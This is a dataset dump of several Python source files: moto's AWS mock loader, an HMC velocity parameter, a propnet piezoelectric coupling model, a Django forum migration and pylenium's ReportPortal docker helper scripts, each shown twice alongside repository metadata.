mock_sns_deprecated = lazy_load(".sns", "mock_sns_deprecated")
mock_sqs = lazy_load(".sqs", "mock_sqs")
mock_sqs_deprecated = lazy_load(".sqs", "mock_sqs_deprecated")
mock_ssm = lazy_load(".ssm", "mock_ssm")
mock_stepfunctions = lazy_load(
    ".stepfunctions", "mock_stepfunctions", backend="stepfunction_backends"
)
mock_sts = lazy_load(".sts", "mock_sts")
mock_sts_deprecated = lazy_load(".sts", "mock_sts_deprecated")
mock_swf = lazy_load(".swf", "mock_swf")
mock_swf_deprecated = lazy_load(".swf", "mock_swf_deprecated")
mock_timestreamwrite = lazy_load(
    ".timestreamwrite", "mock_timestreamwrite", boto3_name="timestream-write"
)
mock_transcribe = lazy_load(".transcribe", "mock_transcribe")
XRaySegment = lazy_load(".xray", "XRaySegment")
mock_xray = lazy_load(".xray", "mock_xray")
mock_xray_client = lazy_load(".xray", "mock_xray_client")
mock_kinesisvideo = lazy_load(".kinesisvideo", "mock_kinesisvideo")
mock_kinesisvideoarchivedmedia = lazy_load(
    ".kinesisvideoarchivedmedia",
    "mock_kinesisvideoarchivedmedia",
    boto3_name="kinesis-video-archived-media",
)
mock_medialive = lazy_load(".medialive", "mock_medialive")
mock_support = lazy_load(".support", "mock_support")
mock_mediaconnect = lazy_load(".mediaconnect", "mock_mediaconnect")
mock_mediapackage = lazy_load(".mediapackage", "mock_mediapackage")
mock_mediastore = lazy_load(".mediastore", "mock_mediastore")
mock_eks = lazy_load(".eks", "mock_eks")
mock_mediastoredata = lazy_load(
    ".mediastoredata", "mock_mediastoredata", boto3_name="mediastore-data"
)
mock_efs = lazy_load(".efs", "mock_efs")
mock_wafv2 = lazy_load(".wafv2", "mock_wafv2")
mock_sdb = lazy_load(".sdb", "mock_sdb")
mock_elasticache = lazy_load(
    ".elasticache", "mock_elasticache", boto3_name="elasticache"
)
class MockAll(ContextDecorator):
    """Context manager / decorator that activates every mock at once.

    On construction it scans this module for ``mock_*`` names, skipping the
    deprecated variants and the ``mock_all`` alias itself, and instantiates
    one mock per name.  Entering starts all of them; exiting stops all.
    """

    def __init__(self):
        self.mocks = []
        for attr in dir(sys.modules["moto"]):
            if not attr.startswith("mock_"):
                continue
            if attr.endswith("_deprecated") or attr == "mock_all":
                continue
            self.mocks.append(globals()[attr]())

    def __enter__(self):
        for active_mock in self.mocks:
            active_mock.start()

    def __exit__(self, *exc):
        for active_mock in self.mocks:
            active_mock.stop()
# Convenience alias so callers can write ``with mock_all():`` or ``@mock_all()``.
mock_all = MockAll
# import logging
# logging.getLogger('boto').setLevel(logging.CRITICAL)
__title__ = "moto"
__version__ = "2.2.18.dev"
try:
    # Need to monkey-patch botocore requests back to underlying urllib3 classes
    # (presumably so HTTP interception happens at the plain urllib3 layer
    # instead of botocore's AWS-aware subclasses -- TODO confirm).
    from botocore.awsrequest import (
        HTTPSConnectionPool,
        HTTPConnectionPool,
        HTTPConnection,
        VerifiedHTTPSConnection,
    )
except ImportError:
    # botocore is absent (or too old to expose these names); nothing to patch.
    pass
else:
    HTTPSConnectionPool.ConnectionCls = VerifiedHTTPSConnection
    HTTPConnectionPool.ConnectionCls = HTTPConnection
| 43.671171 | 100 | 0.749252 | import importlib
import sys
from contextlib import ContextDecorator
def lazy_load(
module_name, element, boto3_name=None, backend=None, warn_repurpose=False
):
def f(*args, **kwargs):
if warn_repurpose:
import warnings
warnings.warn(
f"Module {element} has been deprecated, and will be repurposed in a later release. "
"Please see https://github.com/spulec/moto/issues/4526 for more information."
)
module = importlib.import_module(module_name, "moto")
return getattr(module, element)(*args, **kwargs)
setattr(f, "name", module_name.replace(".", ""))
setattr(f, "element", element)
setattr(f, "boto3_name", boto3_name or f.name)
setattr(f, "backend", backend or f"{f.name}_backends")
return f
mock_acm = lazy_load(".acm", "mock_acm")
mock_apigateway = lazy_load(".apigateway", "mock_apigateway")
mock_apigateway_deprecated = lazy_load(".apigateway", "mock_apigateway_deprecated")
mock_athena = lazy_load(".athena", "mock_athena")
mock_applicationautoscaling = lazy_load(
".applicationautoscaling", "mock_applicationautoscaling"
)
mock_autoscaling = lazy_load(".autoscaling", "mock_autoscaling")
mock_autoscaling_deprecated = lazy_load(".autoscaling", "mock_autoscaling_deprecated")
mock_lambda = lazy_load(
".awslambda", "mock_lambda", boto3_name="lambda", backend="lambda_backends"
)
mock_lambda_deprecated = lazy_load(".awslambda", "mock_lambda_deprecated")
mock_batch = lazy_load(".batch", "mock_batch")
mock_budgets = lazy_load(".budgets", "mock_budgets")
mock_cloudformation = lazy_load(".cloudformation", "mock_cloudformation")
mock_cloudformation_deprecated = lazy_load(
".cloudformation", "mock_cloudformation_deprecated"
)
mock_cloudfront = lazy_load(".cloudfront", "mock_cloudfront")
mock_cloudtrail = lazy_load(".cloudtrail", "mock_cloudtrail", boto3_name="cloudtrail")
mock_cloudwatch = lazy_load(".cloudwatch", "mock_cloudwatch")
mock_cloudwatch_deprecated = lazy_load(".cloudwatch", "mock_cloudwatch_deprecated")
mock_codecommit = lazy_load(".codecommit", "mock_codecommit")
mock_codepipeline = lazy_load(".codepipeline", "mock_codepipeline")
mock_cognitoidentity = lazy_load(
".cognitoidentity", "mock_cognitoidentity", boto3_name="cognito-identity"
)
mock_cognitoidentity_deprecated = lazy_load(
".cognitoidentity", "mock_cognitoidentity_deprecated"
)
mock_cognitoidp = lazy_load(".cognitoidp", "mock_cognitoidp", boto3_name="cognito-idp")
mock_cognitoidp_deprecated = lazy_load(".cognitoidp", "mock_cognitoidp_deprecated")
mock_config = lazy_load(".config", "mock_config")
mock_datapipeline = lazy_load(".datapipeline", "mock_datapipeline")
mock_datapipeline_deprecated = lazy_load(
".datapipeline", "mock_datapipeline_deprecated"
)
mock_datasync = lazy_load(".datasync", "mock_datasync")
mock_dms = lazy_load(".dms", "mock_dms")
mock_ds = lazy_load(".ds", "mock_ds", boto3_name="ds")
mock_dynamodb = lazy_load(".dynamodb", "mock_dynamodb", warn_repurpose=True)
mock_dynamodb_deprecated = lazy_load(".dynamodb", "mock_dynamodb_deprecated")
mock_dynamodb2 = lazy_load(".dynamodb2", "mock_dynamodb2", backend="dynamodb_backends2")
mock_dynamodb2_deprecated = lazy_load(".dynamodb2", "mock_dynamodb2_deprecated")
mock_dynamodbstreams = lazy_load(".dynamodbstreams", "mock_dynamodbstreams")
mock_elasticbeanstalk = lazy_load(
".elasticbeanstalk", "mock_elasticbeanstalk", backend="eb_backends"
)
mock_ec2 = lazy_load(".ec2", "mock_ec2")
mock_ec2_deprecated = lazy_load(".ec2", "mock_ec2_deprecated")
mock_ec2instanceconnect = lazy_load(".ec2instanceconnect", "mock_ec2instanceconnect")
mock_ecr = lazy_load(".ecr", "mock_ecr")
mock_ecr_deprecated = lazy_load(".ecr", "mock_ecr_deprecated")
mock_ecs = lazy_load(".ecs", "mock_ecs")
mock_ecs_deprecated = lazy_load(".ecs", "mock_ecs_deprecated")
mock_elastictranscoder = lazy_load(".elastictranscoder", "mock_elastictranscoder")
mock_elb = lazy_load(".elb", "mock_elb")
mock_elb_deprecated = lazy_load(".elb", "mock_elb_deprecated")
mock_elbv2 = lazy_load(".elbv2", "mock_elbv2")
mock_emr = lazy_load(".emr", "mock_emr")
mock_emr_deprecated = lazy_load(".emr", "mock_emr_deprecated")
mock_emrcontainers = lazy_load(
".emrcontainers", "mock_emrcontainers", boto3_name="emr-containers"
)
mock_events = lazy_load(".events", "mock_events")
mock_firehose = lazy_load(".firehose", "mock_firehose")
mock_forecast = lazy_load(".forecast", "mock_forecast")
mock_glacier = lazy_load(".glacier", "mock_glacier")
mock_glacier_deprecated = lazy_load(".glacier", "mock_glacier_deprecated")
mock_glue = lazy_load(".glue", "mock_glue")
mock_guardduty = lazy_load(".guardduty", "mock_guardduty")
mock_iam = lazy_load(".iam", "mock_iam")
mock_iam_deprecated = lazy_load(".iam", "mock_iam_deprecated")
mock_iot = lazy_load(".iot", "mock_iot")
mock_iotdata = lazy_load(".iotdata", "mock_iotdata", boto3_name="iot-data")
mock_kinesis = lazy_load(".kinesis", "mock_kinesis")
mock_kinesis_deprecated = lazy_load(".kinesis", "mock_kinesis_deprecated")
mock_kms = lazy_load(".kms", "mock_kms")
mock_kms_deprecated = lazy_load(".kms", "mock_kms_deprecated")
mock_logs = lazy_load(".logs", "mock_logs")
mock_logs_deprecated = lazy_load(".logs", "mock_logs_deprecated")
mock_managedblockchain = lazy_load(".managedblockchain", "mock_managedblockchain")
mock_opsworks = lazy_load(".opsworks", "mock_opsworks")
mock_opsworks_deprecated = lazy_load(".opsworks", "mock_opsworks_deprecated")
mock_organizations = lazy_load(".organizations", "mock_organizations")
mock_polly = lazy_load(".polly", "mock_polly")
mock_ram = lazy_load(".ram", "mock_ram")
mock_rds = lazy_load(".rds", "mock_rds", warn_repurpose=True)
mock_rds_deprecated = lazy_load(".rds", "mock_rds_deprecated")
mock_rds2 = lazy_load(".rds2", "mock_rds2", boto3_name="rds")
mock_rds2_deprecated = lazy_load(".rds2", "mock_rds2_deprecated")
mock_redshift = lazy_load(".redshift", "mock_redshift")
mock_redshift_deprecated = lazy_load(".redshift", "mock_redshift_deprecated")
mock_resourcegroups = lazy_load(
".resourcegroups", "mock_resourcegroups", boto3_name="resource-groups"
)
mock_resourcegroupstaggingapi = lazy_load(
".resourcegroupstaggingapi", "mock_resourcegroupstaggingapi"
)
mock_route53 = lazy_load(".route53", "mock_route53")
mock_route53_deprecated = lazy_load(".route53", "mock_route53_deprecated")
mock_route53resolver = lazy_load(
".route53resolver", "mock_route53resolver", boto3_name="route53resolver"
)
mock_s3 = lazy_load(".s3", "mock_s3")
mock_s3_deprecated = lazy_load(".s3", "mock_s3_deprecated")
mock_sagemaker = lazy_load(".sagemaker", "mock_sagemaker")
mock_secretsmanager = lazy_load(".secretsmanager", "mock_secretsmanager")
mock_ses = lazy_load(".ses", "mock_ses")
mock_ses_deprecated = lazy_load(".ses", "mock_ses_deprecated")
mock_sns = lazy_load(".sns", "mock_sns")
mock_sns_deprecated = lazy_load(".sns", "mock_sns_deprecated")
mock_sqs = lazy_load(".sqs", "mock_sqs")
mock_sqs_deprecated = lazy_load(".sqs", "mock_sqs_deprecated")
mock_ssm = lazy_load(".ssm", "mock_ssm")
mock_stepfunctions = lazy_load(
".stepfunctions", "mock_stepfunctions", backend="stepfunction_backends"
)
mock_sts = lazy_load(".sts", "mock_sts")
mock_sts_deprecated = lazy_load(".sts", "mock_sts_deprecated")
mock_swf = lazy_load(".swf", "mock_swf")
mock_swf_deprecated = lazy_load(".swf", "mock_swf_deprecated")
mock_timestreamwrite = lazy_load(
".timestreamwrite", "mock_timestreamwrite", boto3_name="timestream-write"
)
mock_transcribe = lazy_load(".transcribe", "mock_transcribe")
XRaySegment = lazy_load(".xray", "XRaySegment")
mock_xray = lazy_load(".xray", "mock_xray")
mock_xray_client = lazy_load(".xray", "mock_xray_client")
mock_kinesisvideo = lazy_load(".kinesisvideo", "mock_kinesisvideo")
mock_kinesisvideoarchivedmedia = lazy_load(
".kinesisvideoarchivedmedia",
"mock_kinesisvideoarchivedmedia",
boto3_name="kinesis-video-archived-media",
)
mock_medialive = lazy_load(".medialive", "mock_medialive")
mock_support = lazy_load(".support", "mock_support")
mock_mediaconnect = lazy_load(".mediaconnect", "mock_mediaconnect")
mock_mediapackage = lazy_load(".mediapackage", "mock_mediapackage")
mock_mediastore = lazy_load(".mediastore", "mock_mediastore")
mock_eks = lazy_load(".eks", "mock_eks")
mock_mediastoredata = lazy_load(
".mediastoredata", "mock_mediastoredata", boto3_name="mediastore-data"
)
mock_efs = lazy_load(".efs", "mock_efs")
mock_wafv2 = lazy_load(".wafv2", "mock_wafv2")
mock_sdb = lazy_load(".sdb", "mock_sdb")
mock_elasticache = lazy_load(
".elasticache", "mock_elasticache", boto3_name="elasticache"
)
class MockAll(ContextDecorator):
def __init__(self):
self.mocks = []
for mock in dir(sys.modules["moto"]):
if (
mock.startswith("mock_")
and not mock.endswith("_deprecated")
and not mock == ("mock_all")
):
self.mocks.append(globals()[mock]())
def __enter__(self):
for mock in self.mocks:
mock.start()
def __exit__(self, *exc):
for mock in self.mocks:
mock.stop()
mock_all = MockAll
__title__ = "moto"
__version__ = "2.2.18.dev"
try:
from botocore.awsrequest import (
HTTPSConnectionPool,
HTTPConnectionPool,
HTTPConnection,
VerifiedHTTPSConnection,
)
except ImportError:
pass
else:
HTTPSConnectionPool.ConnectionCls = VerifiedHTTPSConnection
HTTPConnectionPool.ConnectionCls = HTTPConnection
| true | true |
f719218d3fe98d1455ee9174e8b9c5286ddf7b15 | 670 | py | Python | src/LocalChoiceModel/vel_param.py | noashin/local_global_attention_model | 531e6a4cc1dc364a6a4168de1b9f972727a8aeb1 | [
"MIT"
] | null | null | null | src/LocalChoiceModel/vel_param.py | noashin/local_global_attention_model | 531e6a4cc1dc364a6a4168de1b9f972727a8aeb1 | [
"MIT"
] | null | null | null | src/LocalChoiceModel/vel_param.py | noashin/local_global_attention_model | 531e6a4cc1dc364a6a4168de1b9f972727a8aeb1 | [
"MIT"
] | null | null | null | import sys
import numpy as np
from scipy.stats import multivariate_normal
sys.path.append('./../../')
from src.HMC.hmcparameter import HMCParameter
class VelParam(HMCParameter):
    """Auxiliary momentum ("velocity") parameter for Hamiltonian Monte Carlo.

    The momentum is resampled from a multivariate normal, so the kinetic
    energy is ``v . v / 2`` and its gradient with respect to ``v`` is ``v``.
    """

    def __init__(self, init_val):
        # Convert once and reuse -- the original converted `init_val` to an
        # ndarray twice (once for super().__init__, once for the shape).
        init_val = np.array(init_val)
        super().__init__(init_val)
        self.mu = np.zeros(init_val.shape)  # mean of the momentum distribution
        self.sigma = 1  # isotropic unit (co)variance scalar

    def gen_init_value(self):
        """Resample the momentum from N(mu, sigma)."""
        self.value = multivariate_normal.rvs(self.mu, self.sigma)

    def get_energy_grad(self):
        """Gradient of the kinetic energy: d/dv (v . v / 2) = v."""
        return self.value

    def get_energy(self):
        """Kinetic energy of the currently stored momentum."""
        return np.dot(self.value, self.value) / 2

    def get_energy_for_value(self, value):
        """Kinetic energy a momentum `value` would have, without storing it."""
        return np.dot(value, value) / 2
| 24.814815 | 65 | 0.665672 | import sys
import numpy as np
from scipy.stats import multivariate_normal
sys.path.append('./../../')
from src.HMC.hmcparameter import HMCParameter
class VelParam(HMCParameter):
def __init__(self, init_val):
super().__init__(np.array(init_val))
dim = np.array(init_val).shape
self.mu = np.zeros(dim)
self.sigma = 1
def gen_init_value(self):
self.value = multivariate_normal.rvs(self.mu, self.sigma)
def get_energy_grad(self):
return self.value
def get_energy(self):
return np.dot(self.value, self.value) / 2
def get_energy_for_value(self, value):
return np.dot(value, value) / 2
| true | true |
f719245ed4a4fb729ba07d5a218d16d0af49e06d | 1,972 | py | Python | propnet/models/python/electromechanical_coupling.py | ruriboshi/propnet | 770703fb4fc344f785f89c02f26b31ea5733d2bd | [
"BSD-3-Clause-LBNL"
] | 57 | 2018-01-09T14:56:20.000Z | 2022-02-24T11:44:42.000Z | propnet/models/python/electromechanical_coupling.py | ruriboshi/propnet | 770703fb4fc344f785f89c02f26b31ea5733d2bd | [
"BSD-3-Clause-LBNL"
] | 214 | 2017-09-26T23:31:09.000Z | 2022-03-14T04:50:58.000Z | propnet/models/python/electromechanical_coupling.py | ruriboshi/propnet | 770703fb4fc344f785f89c02f26b31ea5733d2bd | [
"BSD-3-Clause-LBNL"
] | 26 | 2017-10-29T21:34:22.000Z | 2022-01-12T05:59:12.000Z | import numpy as np
def plug_in(symbol_values):
    """Compute the electromechanical coupling factor from S, e and d.

    Returns a dict with key ``"k"`` when all three tensors are supplied;
    otherwise an empty dict.
    """
    out = {}
    if all(name in symbol_values for name in ("S", "e", "d")):
        compliance = symbol_values["S"]
        dielectric = symbol_values["e"]
        piezo = symbol_values["d"]
        # k = |d_33| / sqrt(e_33 * S_33), using the (3,3) components.
        out["k"] = np.abs(piezo[2][2] / np.sqrt(dielectric[2][2] * compliance[2][2]))
    return out
# Human-readable summary attached to the model registry entry below.
DESCRIPTION = """
Model calculating the electromechanical coupling factor,
which is the efficiency of converting eletrical energy
to acoustic energy in a piezoeletric transducer or filter
"""
# NOTE(review): the "eletrical"/"piezoeletric" typos above live inside the
# runtime string, so they are left untouched here; fix upstream if the text
# is user-facing.
# One reference evaluation: realistic S/e/d tensors and the k they produce.
test_data = [{
    "inputs": {
        "S": [[0.007482236755310126, -0.002827041595205337, -0.002827041595205337, 0.0, 0.0, 0.0],
              [-0.002827041595205337, 0.007482236755310125, -0.002827041595205337, 0.0, 0.0, 0.0],
              [-0.0028270415952053366, -0.002827041595205337, 0.007482236755310125, 0.0, 0.0, 0.0],
              [0.0, 0.0, 0.0, 0.010309278350515464, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.010309278350515464, 0.0],
              [0.0, 0.0, 0.0, 0.0, 0.0, 0.010309278350515464]],
        "e": [[18.65, 0.00, 0.00], [-0.00, 18.65, 0.00], [-0.00, 0.00, 7.88]],
        "d": [[-0.0412497, -0.28686697, 0.06342802], [0.05065159, 0.26064878, -0.04828778],
              [0.08828203, 0.5660897, -0.11520665], [-0.16218673, -0.92468949, 0.2109461],
              [0.02485558, 0.03232004, -0.02421919], [0.06636329, 0.46541895, -0.09526407]]
    },
    "outputs": {
        "k": 0.47445902984
    }
}]
# Registry entry consumed by the surrounding model framework: wires the
# symbols used by `plug_in` to canonical variable names and metadata.
config = {
    "name": "electromechanical_coupling",
    "connections": [{
        "inputs": ["e", "S", "d"],
        "outputs": ["k"]
    }],
    "categories": ["mechanical", "electrical"],
    "variable_symbol_map": {
        "S": "compliance_tensor_voigt",
        "e": "dielectric_tensor",
        "d": "piezoelectric_tensor_converse",
        "k": "electromechanical_coupling"
    },
    "description": DESCRIPTION,
    "implemented_by": ["shyamd"],
    "references": [],
    "plug_in": plug_in,
    "test_data": test_data
}
| 32.866667 | 111 | 0.573022 | import numpy as np
def plug_in(symbol_values):
req_symbols = ["S", "e", "d"]
data = {}
if all(s in symbol_values for s in req_symbols):
e = symbol_values["e"]
S = symbol_values["S"]
d = symbol_values["d"]
data["k"] = np.abs(d[2][2] / np.sqrt(e[2][2] * S[2][2]))
return data
DESCRIPTION = """
Model calculating the electromechanical coupling factor,
which is the efficiency of converting eletrical energy
to acoustic energy in a piezoeletric transducer or filter
"""
test_data = [{
"inputs": {
"S": [[0.007482236755310126, -0.002827041595205337, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.002827041595205337, 0.007482236755310125, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.0028270415952053366, -0.002827041595205337, 0.007482236755310125, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.010309278350515464, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.010309278350515464, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.010309278350515464]],
"e": [[18.65, 0.00, 0.00], [-0.00, 18.65, 0.00], [-0.00, 0.00, 7.88]],
"d": [[-0.0412497, -0.28686697, 0.06342802], [0.05065159, 0.26064878, -0.04828778],
[0.08828203, 0.5660897, -0.11520665], [-0.16218673, -0.92468949, 0.2109461],
[0.02485558, 0.03232004, -0.02421919], [0.06636329, 0.46541895, -0.09526407]]
},
"outputs": {
"k": 0.47445902984
}
}]
config = {
"name": "electromechanical_coupling",
"connections": [{
"inputs": ["e", "S", "d"],
"outputs": ["k"]
}],
"categories": ["mechanical", "electrical"],
"variable_symbol_map": {
"S": "compliance_tensor_voigt",
"e": "dielectric_tensor",
"d": "piezoelectric_tensor_converse",
"k": "electromechanical_coupling"
},
"description": DESCRIPTION,
"implemented_by": ["shyamd"],
"references": [],
"plug_in": plug_in,
"test_data": test_data
}
| true | true |
f7192509abdc2fa2929bd17b5a5b981950b115dd | 875 | py | Python | forum/migrations/0008_auto_20180116_0137.py | SH-anonta/Discussion-Forum | 03c92916d4dd708ad76e0aa945aaecacb1eac30e | [
"MIT"
] | null | null | null | forum/migrations/0008_auto_20180116_0137.py | SH-anonta/Discussion-Forum | 03c92916d4dd708ad76e0aa945aaecacb1eac30e | [
"MIT"
] | null | null | null | forum/migrations/0008_auto_20180116_0137.py | SH-anonta/Discussion-Forum | 03c92916d4dd708ad76e0aa945aaecacb1eac30e | [
"MIT"
] | null | null | null | # Generated by Django 2.0.1 on 2018-01-15 19:37
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Creates a ``UserProfile`` model linked one-to-one to the configured
    # auth user model, and deletes the app's previous ``User`` model.

    dependencies = [
        # The swappable auth user model must exist before the
        # OneToOneField below can reference it.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('forum', '0007_auto_20180113_1812'),
    ]
    operations = [
        migrations.CreateModel(
            name='UserProfile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        # NOTE(review): this drops the old ``User`` table and its rows; no
        # data migration is visible here -- confirm that data loss is intended.
        migrations.DeleteModel(
            name='User',
        ),
        migrations.AddField(
            model_name='userprofile',
            name='user',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
| 28.225806 | 114 | 0.618286 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('forum', '0007_auto_20180113_1812'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.DeleteModel(
name='User',
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| true | true |
f719250ed98ee5f352d386094fce8e0557ce50cb | 4,716 | py | Python | pylenium/scripts/report_portal.py | xtrakTD/pyleniumio | 3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6 | [
"MIT"
] | 169 | 2020-03-16T15:04:42.000Z | 2022-03-31T18:53:41.000Z | pylenium/scripts/report_portal.py | xtrakTD/pyleniumio | 3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6 | [
"MIT"
] | 163 | 2020-03-15T06:33:54.000Z | 2022-03-31T21:37:09.000Z | pylenium/scripts/report_portal.py | xtrakTD/pyleniumio | 3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6 | [
"MIT"
] | 26 | 2020-03-28T05:43:22.000Z | 2022-02-11T16:46:34.000Z | """ ReportPortal.io integration
1. Download the ReportPortal `docker-compose.yml` file as "docker-compose.report-portal.yml"
2. Setup permissions for ElasticSearch
3. Configure the `YAML` file based on OS
4. `docker-compose up`
5. Open ReportPortal and login (change password afterwards)
"""
import platform
from pylenium.scripts import cli_utils
def __stop_containers():
    """ Stop every ReportPortal container (matched by the "reportportal" name filter).

    Returns:
        `CompletedProcess`
    """
    if platform.system() == 'Windows':
        # cmd.exe has no $(...) command substitution; emulate it with FOR /f.
        command = "FOR /f \"tokens=*\" %i IN " \
                  "('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
                  "DO docker stop %i"
    else:
        command = 'docker stop $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
    stop_containers_response = cli_utils.run_process(command, shell=True)
    if stop_containers_response.returncode != 0:
        raise EnvironmentError(f'[FAILED] {command}'
                               '\n\nUnable to stop ReportPortal containers:'
                               '\n * Make sure Docker is installed and running'
                               '\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
                               f'\nResponse: {stop_containers_response}')
    return stop_containers_response
def __remove_containers():
    """ Remove (``docker rm``) every stopped ReportPortal container.

    Returns:
        `CompletedProcess`
    """
    if platform.system() == 'Windows':
        # cmd.exe has no $(...) command substitution; emulate it with FOR /f.
        command = "FOR /f \"tokens=*\" %i IN " \
                  "('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
                  "DO docker rm %i"
    else:
        command = 'docker rm $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
    remove_containers_response = cli_utils.run_process(command, shell=True)
    if remove_containers_response.returncode != 0:
        raise EnvironmentError(f'[FAILED] {command}'
                               '\n\nUnable to remove ReportPortal containers after stopping them.'
                               f'\nResponse: {remove_containers_response}')
    return remove_containers_response
def download_compose_yaml_file():
    """ Download ReportPortal's compose file to ./docker-compose.report-portal.yml.

    Run this from the project root: the file is written relative to the
    current working directory, where the other commands expect to find it.

    Returns:
        `CompletedProcess` if successful.

    Raises:
        `ConnectionError` if the curl process exits with a non-zero status.
    """
    curl_args = [
        'curl', 'https://raw.githubusercontent.com/reportportal/reportportal/master/docker-compose.yml',
        '-o', './docker-compose.report-portal.yml'
    ]
    response = cli_utils.run_process(curl_args)
    if response.returncode != 0:
        raise ConnectionError(f'\n\nUnable to download docker-compose file from ReportPortal repo. '
                              f'\nResponse: {response}')
    return response
def compose_up():
    """ Start a ReportPortal instance from docker-compose.report-portal.yml.

    Containers are created detached and force-recreated under the
    "reportportal" project prefix.

    Returns:
        `CompletedProcess`

    Raises:
        `EnvironmentError` if docker-compose exits with a non-zero status.
    """
    compose_args = [
        'docker-compose', '-p', 'reportportal',    # prefix containers with 'reportportal'
        '-f', 'docker-compose.report-portal.yml',  # use our auto-generated compose.yml
        'up', '-d', '--force-recreate'             # detached, recreate even if unchanged
    ]
    response = cli_utils.run_process(compose_args)
    if response.returncode != 0:
        raise EnvironmentError('\n\nUnable to run "docker-compose" command to create ReportPortal instance.'
                               '\n * Make sure Docker is installed and running'
                               '\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
                               f'\nResponse: {response}')
    return response
def down():
    """ Tear down the ReportPortal instance.

    This does not use the docker-compose.report-portal.yml file because, depending on Docker version, you may
    or may not have a network created that is not handled by docker-compose down.

    1. Stop all reportportal containers
    2. Kill (remove) all reportportal containers
    3. Remove the reportportal_default network (depends on docker version)

    Returns:
        `CompletedProcess` of the network-removal command.  Note that its
        return code is not checked here -- NOTE(review): presumably because
        the network may legitimately not exist on some Docker versions;
        confirm that ignoring a failed `docker network rm` is intended.

    Raises:
        `EnvironmentError` if stopping or removing the containers fails
        (propagated from the private helpers above).
    """
    __stop_containers()
    __remove_containers()
    remove_network_response = cli_utils.run_process([
        'docker', 'network', 'rm', 'reportportal_default'
    ])
    return remove_network_response
| 38.341463 | 119 | 0.6338 |
import platform
from pylenium.scripts import cli_utils
def __stop_containers():
command = 'docker stop $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker stop %i"
stop_containers_response = cli_utils.run_process(command, shell=True)
if stop_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to stop ReportPortal containers:'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {stop_containers_response}')
return stop_containers_response
def __remove_containers():
command = 'docker rm $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker rm %i"
remove_containers_response = cli_utils.run_process(command, shell=True)
if remove_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to remove ReportPortal containers after stopping them.'
f'\nResponse: {remove_containers_response}')
return remove_containers_response
def download_compose_yaml_file():
    """Download ReportPortal's docker-compose.yml into the current directory.

    Uses ``curl`` to save the upstream file as
    ``./docker-compose.report-portal.yml``. Returns the ``CompletedProcess``;
    raises ``ConnectionError`` when the download fails.
    """
    compose_url = 'https://raw.githubusercontent.com/reportportal/reportportal/master/docker-compose.yml'
    download = cli_utils.run_process(
        ['curl', compose_url, '-o', './docker-compose.report-portal.yml'])
    if download.returncode == 0:
        return download
    raise ConnectionError(f'\n\nUnable to download docker-compose file from ReportPortal repo. '
                          f'\nResponse: {download}')
def compose_up():
    """Create (or recreate) the ReportPortal stack with docker-compose.

    Runs ``docker-compose up -d --force-recreate`` against
    ``docker-compose.report-portal.yml`` under the project name
    ``reportportal``. Returns the ``CompletedProcess``; raises
    ``EnvironmentError`` on failure.
    """
    up_args = [
        'docker-compose', '-p', 'reportportal',
        '-f', 'docker-compose.report-portal.yml',
        'up', '-d', '--force-recreate',
    ]
    result = cli_utils.run_process(up_args)
    if result.returncode != 0:
        raise EnvironmentError(
            '\n\nUnable to run "docker-compose" command to create ReportPortal instance.'
            '\n * Make sure Docker is installed and running'
            '\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
            f'\nResponse: {result}')
    return result
def down():
    """Tear down the ReportPortal instance.

    Stops then removes every ReportPortal container and finally removes the
    ``reportportal_default`` network. The network removal's exit status is
    deliberately not checked: depending on the Docker version the network may
    not exist. Returns the ``CompletedProcess`` of ``docker network rm``.
    """
    __stop_containers()
    __remove_containers()
    return cli_utils.run_process(
        ['docker', 'network', 'rm', 'reportportal_default'])
| true | true |
f71925bd9fe55e2d80c707e532175799b9940cd4 | 147 | py | Python | src/radical/pilot/worker/__init__.py | eirrgang/radical.pilot | ceccd1867dd172935d602ff4c33a5ed4467e0dc8 | [
"MIT"
] | 47 | 2015-03-16T01:08:11.000Z | 2022-02-02T10:36:39.000Z | src/radical/pilot/worker/__init__.py | eirrgang/radical.pilot | ceccd1867dd172935d602ff4c33a5ed4467e0dc8 | [
"MIT"
